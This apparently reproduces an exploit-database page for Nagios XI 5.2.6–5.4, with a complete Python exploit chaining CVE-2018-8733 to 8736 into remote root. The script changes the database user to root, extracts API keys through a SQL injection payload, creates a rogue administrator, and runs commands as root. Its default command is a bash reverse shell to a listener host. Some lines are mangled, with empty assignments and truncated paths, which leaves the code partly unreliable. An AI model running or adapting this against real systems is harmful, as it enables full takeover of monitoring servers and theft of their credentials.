nagios xi 5.2.6 < 5.2.9 5.3 5.4 chained remote root

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nagios xi 5.2.6 < 5.2.9 5.3 5.4 chained remote root Code Code...
# Exploit Title: Nagios XI 5.2.[6-9], 5.3, 5.4 Chained Remote Root # Date: 4/17/2018 # Exploit Authors: Benny Husted, Jared Arave, Cale Smith # Contact: || || # Vendor Homepage: # Software Link: # Version: Nagios XI versions 5.2.[6-9], 5.3, 5.4 # Tested on: CentOS 6.7 # CVE: CVE-2018-8733, CVE-2018-8734, CVE-2018-8735, CVE-2018-8736 import httplib import urllib import ssl import sys import base64 import random import time import string import json import re from optparse import OptionParser # Print some helpful words: print """ ############################################################################### Nagois XI 5.2.[6-9], 5.3, 5.4 Chained Remote Root This exploit leverages the vulnerabilities enumerated in these CVES: [ CVE-2018-8733, CVE-2018-8734, CVE-2018-8735, CVE-2018-8736 ] More details here: Steps are as follows: 0. Determine Version 1. Change the database user to root:nagiosxi 2. Get an API key w/ SQLi 3. Use the API Key to add an administrative user 4. Login as that administrative user 5. Do some authenticated RCE w/ privesc 6. Cleanup. ############################################################################### """ # TODO: Figure out what port it's running on, 80 or 443. def parse_apikeys(resp): begin_delim = 'START_API:' end_delim = ':END_API' start_indecies = [m.start() for m in re.finditer(begin_delim, resp)] end_indecies = [m.start() for m in re.finditer(end_delim, resp)] unique_keys = [] for i, index in enumerate(start_indecies): start_index = index + len(begin_delim) end_index = end_indecies[i] key = resp[start_index:end_index] if not key in unique_keys: unique_keys.append(key) return unique_keys def parse_nsp_str(resp): begin_delim = 'var nsp_str = "' end_delim = '";\n' start_index = resp.find(begin_delim) + len(begin_delim) resp = resp[start_index:] end_index = resp.find(end_delim) return resp[:end_index] def parse_cmd_id(resp, cmdname): begin_delim = "'" end_delim = "', '{0}')\"><img src='images/cross.png' alt='Delete'>".format(cmdname) end_idx = resp.find(end_delim) resp = resp[:end_idx] resp = resp[resp.rfind(begin_delim)+1:] return resp def parse_nagiosxi(resp): resp = str(resp) begin_delim = 'Set-Cookie: nagiosxi=' end_delim = ';' # find the last instance of the nagiosxi cookie... start_index = resp.rfind(begin_delim) + len(begin_delim) resp = resp[start_index:] end_index = resp.find(end_delim) return resp[:end_index] def parse_version(resp): resp = str(resp) begin_delim = 'name="version" value="' end_delim = '"' start_index = resp.rfind(begin_delim) + len(begin_delim) resp = resp[start_index:] end_index = resp.find(end_delim) return resp[:end_index] def change_db_user(usr, pwd, step): url = '/nagiosql/admin/settings.php' headers = {'Host' : RHOST, 'Content-Type' : 'application/x-www-form-urlencoded'} params = urllib.urlencode({ 'txtRootPath':'nagiosql', 'txtBasePath':'/var/www/html/nagiosql/', 'selProtocol':'http', 'txtTempdir':'/tmp', 'selLanguage':'en_GB', 'txtEncoding':'utf-8', 'txtDBserver':'localhost', 'txtDBport':3306, 'txtDBname':'nagiosql', 'txtDBuser': usr, 'txtDBpass':pwd, 'txtLogoff':3600, 'txtLines':15, 'selSeldisable':1 }) print "[+] STEP {0}: Setting Nagios QL DB user to {1}.".format(step, usr) print "[+] STEP {0}: http://{1}{2}".format(step, RHOST, url) con = httplib.HTTPConnection(RHOST, 80) con.set_debuglevel(0) con.request("POST", url, params, headers=headers) resp = con.getresponse() con.close() return resp # Disable SSL Cert validation if hasattr(ssl, '_create_unverified_context'): ssl._create_default_https_context = ssl._create_unverified_context # Parse command line args: usage = "Usage: %prog -r <appliance_ip> -l <listener_ip> -p <listener_port>\n"\ " %prog -r <appliance_ip> -c 'touch /tmp/foooooooooooo'" parser = OptionParser(usage=usage) parser.add_option("-r", '--RHOST', dest='rhost', action="store", help="Target Nagios XI host") parser.add_option("-l", '--LHOST', dest='lhost', action="store", help="Host listening for reverse shell connection") parser.add_option("-p", '--LPORT', dest='lport', action="store", help="Port on which nc is listening") parser.add_option("-c", '--cmd', dest='cmd', action="store", help="Run a custom command, no reverse shell for you.") (options, args) = parser.parse_args() if not options.rhost: parser.error("[!] No remote host specified.\n") parser.print_help() sys.exit(1) RHOST = options.rhost LHOST = options.lhost LPORT = options.lport if options.cmd: cmd = options.cmd else: cmd = 'bash -i >& /dev/tcp/{0}/{1} 0>&1 &'.format(LHOST, LPORT) ################################################################ # REQUEST ZERO: GET NAGIOS VERSION ################################################################ url0 = '/nagiosxi/login.php' headers0 = {'Host' : RHOST, 'Content-Type' : 'application/x-www-form-urlencoded'} print "[+] STEP 0: Get Nagios XI version string." print "[+] STEP 0: http://{0}{1}".format(RHOST, url0) con0 = httplib.HTTPConnection(RHOST, 80) con0.set_debuglevel(0) con0.request("POST", url0, headers=headers0) r0 = con0.getresponse() r0_resp = version = parse_version(r0_resp) ver_int = int(version.split('.')[1]) con0.close() print "[+] STEP 0: Nagios XI verions is: {0}".format(version) ################################################################ # REQUEST ONE: CHANGE THE DATABASE USER TO ROOT ################################################################ r1 = change_db_user('root', 'nagiosxi', '1') if r1.status == 302: print "[+] STEP 1: Received a 302 Response. That's good!" else: print "[!] STEP 1: Received a {0} Response. That's bad.".format(str(r1.status)) exit() ################################################################ # REQUEST TWO: GET THE API KEY USING SQLi ################################################################ print "" url2 = '/nagiosql/admin/helpedit.php' headers2 = {'Host' : RHOST, 'Content-Type' : 'application/x-www-form-urlencoded'} # Versions of NagiosXI < 5.3.0 use 'backend_ticket', not 'api_key'. sqli_param = "api_key" if (ver_int >= 3) else "backend_ticket" print sqli_param params2 = urllib.urlencode({ 'selInfoKey1':'c\'UNION SELECT CONCAT(\'START_API:\',{0},\':END_API\') FROM nagiosxi.xi_users-- '.format(sqli_param), 'hidKey1':'common', 'selInfoKey2':'free_variables_name', 'hidKey2':'', 'selInfoVersion':'', 'hidVersion':'', 'taContent':'', 'modus':0, '':'' }) print "[+] STEP 2: Exploiting SQLi to extract user API keys." print "[+] STEP 2: http://{0}{1}".format(RHOST, url2) con2 = httplib.HTTPConnection(RHOST, 80) con2.set_debuglevel(1) con2.request("POST", url2, params2, headers=headers2) r2 = con2.getresponse() if r2.status == 302: print "[+] STEP 2: Received a 302 Response. That's good!" else: print "[!] STEP 2: Received a {0} Response. That's bad.".format(str(r2.status)) exit() con2.close() r2_resp = api_keys = parse_apikeys(r2_resp) random.shuffle(api_keys) if len(api_keys) > 0: print "[+] Found {0} unique API keys. Cool:".format(str(len(api_keys))) for key in api_keys: print "[+] {0}".format(key) else: print "[!] No API keys found! Oh no. Exiting..." exit() ################################################################ # REQUEST THREE: USE THE API KEY TO ADD AN ADMIN USER ################################################################ print "" url3 = '/nagiosxi/api/v1/system/user?apikey=XXXAPIKEYLIVESHEREXXX&pretty=1' headers3 = {'Host' : RHOST, 'Content-Type' : 'application/x-www-form-urlencoded'} # Generate the sketchiest username possibe :D sploit_username = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(16)) # And also the worlds best password sploit_password = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(16)) params3 = urllib.urlencode({ 'username':sploit_username, 'password':sploit_password, 'name':'Firsty Lasterson', 'email':'{0}@localhost'.format(sploit_username), 'auth_level':'admin', 'force_pw_change':0 }) print "[+] STEP 3: Using API Keys to add an administrative user..." found_it = False for i, key in enumerate(api_keys): url3_try = url3.replace('XXXAPIKEYLIVESHEREXXX', key) print "[+] STEP 3: http://{0}{1}".format(RHOST, url3_try) con3 = httplib.HTTPConnection(RHOST, 80) con3.set_debuglevel(0) con3.request("POST", url3_try, params3, headers=headers3) r3 = con3.getresponse() r3_contents = if r3.status == 200: print "[+] STEP 3: Received a 200 Response. That's good!" if "was added successfully" in r3_contents: print "[+] STEP 3: User account username:{0} passwd: {1} was added successfully!".format(sploit_username, sploit_password) print "[+] STEP 3: Moving to Step 4...." found_it = True con3.close() break else: "[!] STEP 3: API_KEY access was denied. That's bad." continue else: print "[!] STEP 3: Received a {0} Response. That's bad.".format(str(r2.status)) continue print "[!] STEP 3: Failed to add a user. Try some more API keys..." con3.close() if found_it == False: print "[!] STEP 3: Step 3 failed.... oh no!" ################################################################ # REQUEST FOUR: LOGIN AS ADMINISTRATIVE USER ################################################################ print "" print "[+] STEP 4.1: Authenticate as user TODO." print "[+] STEP 4.1: Get NSP for login..." url4p1 = '/nagiosxi/login.php' headers4p1 = {'Host' : RHOST} params4p1 = "" con4p1 = httplib.HTTPConnection(RHOST, 80) con4p1.set_debuglevel(0) con4p1.request("POST", url4p1, params4p1, headers=headers4p1) r4p1 = con4p1.getresponse() r4p1_resp = login_nsp = parse_nsp_str(r4p1_resp) login_nagiosxi = parse_nagiosxi(r4p1.msg) con4p1.close() print "[+] STEP 4.1: login_nsp = {0}".format(login_nsp) print "[+] STEP 4.1: login_nagiosxi = {0}".format(login_nagiosxi) # 4.2 --------------------------------------------------------------- print "[+] STEP 4.2: Authenticating..." url4p2 = '/nagiosxi/login.php' headers4p2 = {'Host' : RHOST, 'Content-Type' : 'application/x-www-form-urlencoded', 'Cookie' : 'nagiosxi={0}'.format(login_nagiosxi)} params4p2 = urllib.urlencode({ 'nsp':login_nsp, 'page':'auth', 'debug':'', 'pageopt':'login', 'username':sploit_username, 'password':sploit_password, 'loginButton':'', }) con4p2 = httplib.HTTPConnection(RHOST, 80) con4p2.set_debuglevel(0) con4p2.request("POST", url4p2, params4p2, headers=headers4p2) r4p2 = con4p2.getresponse() r4p2_resp = authed_nagiosxi = parse_nagiosxi(r4p2.msg) con4p2.close() print "[+] STEP 4.2: authed_nagiosxi = {0}".format(authed_nagiosxi) # 4.3 --------------------------------------------------------------- print "[+] STEP 4.3: Getting an authed nsp token..." url4p3 = '/nagiosxi/index.php' headers4p3 = {'Host' : RHOST, 'Content-Type' : 'application/x-www-form-urlencoded', 'Cookie' : 'nagiosxi={0}'.format(authed_nagiosxi)} params4p3 = "" con4p3 = httplib.HTTPConnection(RHOST, 80) con4p3.set_debuglevel(0) con4p3.request("POST", url4p3, params4p3, headers=headers4p3) r4p3 = con4p3.getresponse() r4p3_resp = authed_nsp = parse_nsp_str(r4p3_resp) con4p3.close() print "[+] STEP 4.3: authed_nsp = {0}".format(authed_nsp) ################################################################ # REQUEST FIVE: Excute command ################################################################ print "[+] STEP 5: Executing command as root!..." url5 = '/nagiosxi/backend/index.php?' headers5 = {'Host' : RHOST, 'Content-Type' : 'application/x-www-form-urlencoded', 'Cookie' : 'nagiosxi={0}'.format(authed_nagiosxi)} privesc_cmd = 'cp /usr/local/nagiosxi/scripts/ /usr/local/nagiosxi/scripts/ && echo "{0}" > /usr/local/nagiosxi/scripts/ && sudo /usr/local/nagiosxi/scripts/ && mv /usr/local/nagiosxi/scripts/ /usr/local/nagiosxi/scripts/'.format(cmd) privesc_cmd = "$(" + privesc_cmd + ")" url5 = url5 + urllib.urlencode({ 'cmd':'submitcommand', 'command':'1111', 'command_data':privesc_cmd }) con5 = httplib.HTTPConnection(RHOST, 80) con5.set_debuglevel(0) con5.request("POST", url5, headers=headers5) r5 = con5.getresponse() r5_resp = con5.close() if r5.status == 200: print "[+] STEP 5: Received a 200 Response. That's good!" else: print "[!] STEP 5: Received a {0} Response. That's bad.".format(str(r5.status)) exit() print "[+] STEP 5: Successfully ran command. We're done?" ################################################################ # REQUEST SIX: Cleanup ################################################################ print "[+] STEP 6: Cleanup time" r1 = change_db_user('nagiosql', 'n@gweb', '6') if r1.status == 302: print "[+] STEP 6: Received a 302 Response. That's good!" else: print "[!] STEP 6: Received a {0} Response. That's bad.".format(str(r1.status)) exit() ################################################################ # Solution: Update to a version of NagiosXI >= 5.4.13 ################################################################

Nagios xi 5.2.6 < 5.2.9 5.3 5.4 chained remote root Vulnerability / Exploit Source : Nagios xi 5.2.6 < 5.2.9 5.3 5.4 chained remote root

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